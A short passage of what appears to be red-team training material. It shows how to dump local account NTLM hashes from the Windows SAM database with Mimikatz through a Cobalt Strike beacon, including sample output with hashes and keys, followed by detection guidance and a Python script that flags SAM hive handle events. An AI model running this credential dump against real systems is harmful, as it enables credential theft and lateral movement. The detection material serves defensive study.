Security Account Manager
The Security Account Manager (SAM) database holds the NTLM hashes of local accounts only. These can be extracted with the lsadump::sam Mimikatz module. If a common local administrator account is used with the same password across an entire environment, this can make lateral movement trivial.
This command requires elevated privileges.
beacon> mimikatz !lsadump::sam
Domain : WKSTN-2
SysKey : b9dc7de8b1972237bbbd7f82d970f79a
Local SID : S-1-5-21-2281971671-4135076198-2136761646
SAMKey : b0664279732686cfbb4b788c078fea82
RID : 000001f4 (500)
User : Administrator
Hash NTLM: fc525c9683e8fe067095ba2ddc971889
lm - 0: 91b6e660bcac036ae7ab67a3d383bc82
ntlm- 0: fc525c9683e8fe067095ba2ddc971889
OPSEC: This module opens a handle to the SAM registry hive. Use the "Suspicious SAM Hive Handle" saved search in Kibana to find these handle events.
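
The detection idea behind that saved search, sketched as an added example (not code from the original page, and not the saved search's actual query, which the page does not show): filter registry handle events for keys under the SAM hive and flag any opened by an unexpected process image. It assumes object-access auditing is enabled on the SAM key so that Windows Security events 4656/4663 are logged; the allowlist and the sample events are constructed for illustration.

```python
# Added example: flag handle requests to the SAM registry hive in audit events.
SAM_HIVE = r"\REGISTRY\MACHINE\SAM"
HANDLE_EVENT_IDS = {4656, 4663}  # handle requested / object accessed
# Assumption: the only image expected to open SAM keys on this fleet.
EXPECTED_IMAGES = {r"c:\windows\system32\lsass.exe"}


def is_sam_key(object_name):
    """True for the SAM hive root or any key below it, case-insensitively."""
    name = object_name.upper().rstrip("\\")
    # Require a path separator after the hive name so that a sibling key
    # such as \REGISTRY\MACHINE\SAMPLES does not match.
    return name == SAM_HIVE or name.startswith(SAM_HIVE + "\\")


def suspicious_sam_handles(events):
    """Return (computer, image, key) for SAM key handles from unexpected images."""
    hits = []
    for ev in events:
        if ev.get("EventID") not in HANDLE_EVENT_IDS:
            continue
        if ev.get("ObjectType") != "Key" or not is_sam_key(ev.get("ObjectName", "")):
            continue
        image = ev.get("ProcessName", "")
        # Compare the full path so a relocated "lsass.exe" is still flagged.
        if image.lower() in EXPECTED_IMAGES:
            continue
        hits.append((ev.get("Computer"), image, ev["ObjectName"]))
    return hits


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {"EventID": 4656, "Computer": "WKSTN-2", "ObjectType": "Key",
     "ObjectName": r"\REGISTRY\MACHINE\SAM\SAM\Domains\Account",
     "ProcessName": r"C:\Windows\System32\lsass.exe"},
    {"EventID": 4656, "Computer": "WKSTN-2", "ObjectType": "Key",
     "ObjectName": r"\REGISTRY\MACHINE\SAM\SAM\Domains\Account\Users\000001F4",
     "ProcessName": r"C:\Windows\System32\rundll32.exe"},
    {"EventID": 4663, "Computer": "WKSTN-2", "ObjectType": "Key",
     "ObjectName": r"\REGISTRY\MACHINE\SAM",
     "ProcessName": r"C:\Users\Public\lsass.exe"},
    {"EventID": 4656, "Computer": "WKSTN-2", "ObjectType": "Key",
     "ObjectName": r"\REGISTRY\MACHINE\SAMPLES\Config",
     "ProcessName": r"C:\Windows\System32\rundll32.exe"},
    {"EventID": 4624, "Computer": "WKSTN-2"},
]

if __name__ == "__main__":
    for computer, image, key in suspicious_sam_handles(SAMPLE_EVENTS):
        print(f"{computer}: {image} opened {key}")
```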